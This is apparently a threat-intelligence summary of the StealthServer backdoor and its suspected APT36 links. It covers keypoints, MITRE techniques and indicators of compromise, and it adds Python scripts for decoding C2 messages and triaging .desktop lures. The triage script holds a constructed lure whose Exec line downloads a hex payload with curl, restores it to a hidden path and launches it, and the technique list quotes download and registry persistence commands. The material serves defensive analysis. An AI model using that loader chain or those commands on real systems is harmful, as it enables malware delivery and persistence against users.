StealthServer is a Golang-based cross-platform backdoor (Windows and Linux) that steals files and executes C2 commands while using junk code, anti-analysis checks, and diverse loaders (.desktop, malicious PPT macros) to evade detection. Observed infrastructure and lure themes targeting a South Asian country suggest possible links to APT36 through domain naming patterns and reuse of delivery tactics. #StealthServer #APT36
Keypoints
- StealthServer is a Golang backdoor family supporting Windows and Linux with core capabilities to exfiltrate files and execute remote commands.
- Operators distribute samples via social-engineered loaders: Windows via a malicious PowerPoint add-in (.ppam) carrying macros, Linux via .desktop shortcuts that open decoy Google Drive PDFs and download hex-encoded payloads.
- The malware employs heavy junk code insertion and function-level obfuscation to slow analysis and also includes anti-debugging, sandbox checks, VM detections, and mutex checks.
- Multiple communication protocols are used across variants: Windows variants used TCP and WebSocket; Linux variants used HTTP and WebSocket; commands and heartbeat/registration messages use JSON (sometimes base64-encoded or XOR-obfuscated).
- Persistence mechanisms differ by OS: Windows uses AppData copies, hidden attributes, registry Run keys, Startup shortcuts, and service/task creation; Linux uses systemd user services, ~/.bashrc/.profile edits, crontab and hidden copies under ~/.config.
- Infrastructure and naming patterns (e.g., modindia.serveminecraft.net, modgovindia.space) and similar domain structures to prior reports link StealthServer activity to suspected APT36 operations targeting a South Asian country.
- Collected IOCs include multiple domains, IPs, and file hashes (samples list provided), and evidence shows shared Golang build paths like D:/bossmaya/…/obfuscated*.go across variants.
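The keypoint on C2 traffic above says the heartbeat/registration messages are JSON that is sometimes base64-encoded or XOR-obfuscated, which is exactly what an analyst has to peel back from a capture before the fields become readable. The script below is an added example, not code from the XLab report or from StealthServer: it strips base64 and single-byte XOR layers until a JSON object parses. The heartbeat content and the key 0x5A are constructed for the demo; the real variants' keys and field names are not on the page.

```python
"""Added example (not code from the XLab report or from StealthServer itself):
peel base64 and single-byte XOR layers off a captured registration or heartbeat
message until a JSON object appears. The heartbeat below and the XOR key 0x5A
are constructed for the demo; real key material is not on the page."""
import base64
import binascii
import json
from typing import List, Optional, Tuple


def try_json(data: bytes) -> Optional[dict]:
    """Return the parsed object if data is a UTF-8 JSON object, else None."""
    try:
        obj = json.loads(data.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError):
        return None
    return obj if isinstance(obj, dict) else None


def try_base64(data: bytes) -> Optional[bytes]:
    """Strict base64 decode; None unless every character is in the alphabet."""
    try:
        out = base64.b64decode(data.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    return out or None


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def brute_xor_json(data: bytes) -> Optional[Tuple[int, dict]]:
    """Try every single-byte key whose output starts with '{'; parse survivors."""
    if not data:
        return None
    for key in range(1, 256):
        if data[0] ^ key != ord("{"):
            continue
        obj = try_json(xor_bytes(data, key))
        if obj is not None:
            return key, obj
    return None


def decode_message(raw: bytes, max_layers: int = 4) -> Tuple[List[str], Optional[dict]]:
    """Strip layers (base64 first, then XOR) until JSON parses.

    Returns (layers_removed, object); object is None if nothing parsed."""
    layers: List[str] = []
    data = raw
    for _ in range(max_layers):
        obj = try_json(data)
        if obj is not None:
            return layers, obj
        decoded = try_base64(data)
        if decoded is not None:
            layers.append("base64")
            data = decoded
            continue
        hit = brute_xor_json(data)
        if hit is not None:
            key, obj = hit
            layers.append(f"xor:0x{key:02x}")
            return layers, obj
        break
    return layers, None


def obfuscate(obj: dict, key: int) -> bytes:
    """Constructed encoder used only to build the demo message: XOR then base64."""
    return base64.b64encode(xor_bytes(json.dumps(obj).encode("utf-8"), key))


# Constructed heartbeat and assumed key; not values taken from real samples.
CONSTRUCTED_HEARTBEAT = {"type": "heartbeat", "id": "host-01", "os": "linux"}
ASSUMED_KEY = 0x5A
SAMPLE_MESSAGE = obfuscate(CONSTRUCTED_HEARTBEAT, ASSUMED_KEY)

if __name__ == "__main__":
    print(decode_message(SAMPLE_MESSAGE))
    print(decode_message(b'{"type": "cmd", "cmd": "whoami"}'))
```

The XOR brute force only parses candidates whose first byte maps to `{`, so it costs at most a handful of JSON parses per message; if a variant wraps a multi-byte key or puts base64 inside the XOR layer, extend `brute_xor_json` to also accept base64-alphabet output.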
MITRE Techniques
- [T1204] User Execution – Loaders use malicious Office macros in PPT and .desktop shortcuts that open decoy PDFs to trick users into executing payloads (“the document contains a malicious macro … opens a PDF to mislead users”).
- [T1105] Ingress Tool Transfer – Payloads are downloaded from remote servers (e.g., “curl … https://securestore[.]cv/ghg/Mt_dated_29.txt”, “https://filestore[.]space/…/nodejs”) and restored from hex to binary before execution.
- [T1027] Obfuscated Files or Information – Samples insert large amounts of junk code and obfuscated function names to hinder analysis (“inserts large amounts of junk code and junk functions to interfere with analysts … the core code is placed at the tail”).
- [T1547 / T1053 / T1543] Boot or Logon Autostart Execution, Scheduled Task/Job, Create or Modify System Process – Implements persistence via startup folders, registry Run keys, scheduled tasks and systemd services to maintain execution across reboots (“copies its own file to %APPData… reg add …”, “copies its own ELF file to … and starts it with systemctl”).
- [T1497] Virtualization/Sandbox Evasion – Detects virtualized/sandbox environments by searching the process list for VM-related process names and checking directories and usernames (“tasklist … checks whether any running process name contains the following sandbox- and VM-related strings”, checks for C:analysis, sandbox directories and specific usernames).
- [T1059.001] Command and Scripting Interpreter: PowerShell – Uses PowerShell commands to hide windows and perform actions (e.g., “cmd /C powershell -WindowStyle Hidden -Command exit” and scripts to create shortcuts in Startup).
- [T1036] Masquerading – Files and shortcuts are named and presented as legitimate PDFs or system/update services to deceive users (“the .desktop file is disguised as a shortcut to a PDF document”, service named “System Update Service”).
- [T1041] Exfiltration Over C2 Channel – Exfiltrates files via HTTP/WebSocket JSON endpoints with encrypted payloads and metadata headers (uploads via “/upload?last=true” with AES-GCM encryption and X-Nonce/X-Username headers).
- [T1071] Application Layer Protocol – Uses HTTP, TCP sockets and WebSocket protocols for C2 communications (e.g., “Windows variants … TCP Socket … third variant switched to WebSocket”, “HTTP request http://modgovindia[.]space:4000/commands”).
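The .desktop loader in the keypoints and the hex-to-binary restore under T1105 above share one triage problem: a shortcut that looks like a PDF but whose Exec= line runs a shell download chain. The script below is an added example, not the report's code or the loader's own; it parses the [Desktop Entry] group, flags the masquerade, download, restore and launch steps, pulls out the URLs, and reverses the hex encoding. The entry itself, the Google Drive file id `EXAMPLE`, the xxd-based restore chain and the hex blob are constructed; only the defanged securestore[.]cv URL comes from the page.

```python
"""Added triage helper (not code from the XLab report or from the loader itself):
parse a .desktop lure of the kind described above, flag masquerading and
download-and-run patterns, extract URLs, and restore a hex-encoded payload.
The entry, the Drive file id EXAMPLE, the xxd chain and the hex blob are all
constructed for this example; only the defanged securestore[.]cv URL is from
the page."""
import re
from typing import Dict, List

URL_RE = re.compile(r"https?://[^\s'\";]+")

# Each check: (finding label, regex applied to the Exec= command line).
# The exact shell chain the real loader uses is not on the page; these are
# assumed building blocks of a download / hex-restore / chmod / launch chain.
EXEC_CHECKS = [
    ("decoy_google_drive_open", re.compile(r"\bxdg-open\b[^;]*drive\.google\.com")),
    ("remote_download", re.compile(r"\b(?:curl|wget)\b")),
    ("hex_to_binary_restore", re.compile(r"\bxxd\b[^;|]*-r")),
    ("chmod_executable", re.compile(r"\bchmod\s+\+x\b")),
    ("hidden_dotfile_path", re.compile(r"/\.[A-Za-z0-9]")),
    ("background_launch", re.compile(r'\bnohup\b|&\s*"?\s*$')),
]


def parse_desktop(text: str) -> Dict[str, str]:
    """Return the key=value pairs of the [Desktop Entry] group."""
    entry: Dict[str, str] = {}
    in_group = False
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


def triage_desktop(text: str) -> Dict[str, List[str]]:
    """Flag a document-looking shortcut whose Exec= runs a shell chain."""
    entry = parse_desktop(text)
    name = entry.get("Name", "")
    exec_cmd = entry.get("Exec", "")
    findings: List[str] = []
    looks_like_doc = re.search(r"\.(?:pdf|docx?|xlsx?|pptx?)$", name, re.I) is not None
    runs_shell = re.search(r"\b(?:bash|sh)\s+-c\b", exec_cmd) is not None
    if looks_like_doc and runs_shell:
        findings.append("document_name_with_shell_exec")
    for label, pattern in EXEC_CHECKS:
        if pattern.search(exec_cmd):
            findings.append(label)
    return {"findings": findings, "urls": URL_RE.findall(exec_cmd)}


def restore_hex_payload(hex_text: str) -> bytes:
    """Reverse the hex encoding: drop whitespace, then decode pairs to bytes."""
    return bytes.fromhex(re.sub(r"\s+", "", hex_text))


def is_elf(blob: bytes) -> bool:
    return blob[:4] == b"\x7fELF"


# Constructed lure: name/icon from the page's file-name pattern, chain assumed.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "xdg-open 'https://drive.google.com/file/d/EXAMPLE/view'; curl -s https://securestore[.]cv/ghg/Mt_dated_29.txt -o /tmp/.m.txt; xxd -r -p /tmp/.m.txt > $HOME/.config/.cache/svc; chmod +x $HOME/.config/.cache/svc; nohup $HOME/.config/.cache/svc &"
"""

# Constructed hex blob: ELF magic plus filler, standing in for the downloaded .txt.
CONSTRUCTED_HEX_PAYLOAD = "7f45 4c46 0201 0100 0000 0000 0000 0000"

if __name__ == "__main__":
    print(triage_desktop(SAMPLE_DESKTOP))
    print(is_elf(restore_hex_payload(CONSTRUCTED_HEX_PAYLOAD)))
```

To run it on a real lure, read the .desktop file into `triage_desktop` and feed the downloaded text file to `restore_hex_payload`; because curl/xxd/chmod are assumed steps rather than confirmed strings from the samples, treat the findings as a triage checklist rather than a detection signature.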
Indicators of Compromise
- [File Hash] example malware samples – dc64c34ba92375f8dc8ae8cf90a1f535a0aa5a29fcf965af5ad4982cd16e9d71, 8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1 (and 10 more hashes).
- [Domain] C2 and hosting – modindia.serveminecraft.net, modgovindia.space (used as C2 endpoints and health/commands paths).
- [Domain] additional infrastructure – seemysitelive.store, kavach.space, sinjita.store (used for WebSocket/TCP C2 or payload hosting).
- [IP Address] observed resolving/hosting – 101.99.94[.]109 (resolved from modindia/modgovindia domains), 45.155.54[.]122 (backup C2 IP listed).
- [File Name] lures/loaders – Meeting_Ltr_ID1543ops.pdf.desktop, PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop, “PM & Est Sanction Final 2025.ppam” (used to deliver payloads).
- [Golang Build Path] build artifacts / source hints – D:/bossmaya/newblkul/client/client_obfuscated.go, D:/bossmaya/newlinuxblkul/client/main_obfuscated_enhanced.go (shared development paths across samples).
Read more: https://blog.xlab.qianxin.com/apt-stealthserver-cn/